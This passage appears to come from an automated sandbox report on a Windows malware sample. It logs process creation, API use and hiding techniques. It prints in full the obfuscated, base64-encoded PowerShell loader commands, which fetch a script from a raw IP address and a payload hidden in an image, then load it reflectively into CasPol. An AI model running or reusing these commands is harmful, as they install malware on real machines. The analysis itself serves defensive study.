5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeingJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04FD3348 push esp; retf 8_2_04FD3351
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004567E0 push eax; ret 12_2_004567FE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00463EF3 push ds; retf 12_2_00463EEC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433FF6 push ecx; ret 12_2_00434009
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
